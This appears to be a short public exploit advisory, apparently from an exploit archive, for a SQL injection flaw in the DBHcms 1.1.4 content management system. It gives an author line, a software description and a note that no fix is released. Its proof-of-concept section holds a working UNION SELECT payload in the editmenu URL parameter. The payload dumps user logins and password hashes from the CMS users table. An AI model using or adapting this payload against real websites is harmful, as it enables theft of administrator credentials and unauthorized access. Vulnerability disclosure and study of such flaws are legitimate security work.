35 lines
No EOL
887 B
Text
35 lines
No EOL
887 B
Text
DBHcms 1.1.4 SQL Injection Vulnerability
|
|
|
|
# Exploit Title: DBHcms 1.1.4 SQL Injection Vulnerability
|
|
# Date: 24-10-2010
|
|
# Author: ZonTa
|
|
# Mail: zontahackers[at]gmail[dot]com
|
|
# IM : zontahackers[at]live[dot]com
|
|
|
|
# Software Link: http://www.drbenhur.com/downloads-dbhcms-114-1-69-en.html
|
|
# Version: 1.1.4
|
|
# Tested on: Apache,PHP5
|
|
|
|
|
|
ABOUT
|
|
--------------
|
|
|
|
The DBHcms is a Open Source content management system for personal
|
|
and small business websites. It is search engine optimized, also
|
|
for multiple languages simultaneously by allowing the search engine
|
|
bot to index every single page.
|
|
|
|
|
|
POC
|
|
--------------
|
|
|
|
http://192.168.1.100/DBHcms/index.php?dbhcms_pid=-81&editmenu=-2+union+select+1,2,3,4,5,6,group_concat(user_login,0x3a,user_passwd),8,9,10,11,12,13,14+from+dbhcms_cms_users--
|
|
|
|
|
|
FIX
|
|
--------------
|
|
|
|
Not yet released.
|
|
|
|
|
|
Greetz to Sri Lankanz ~ |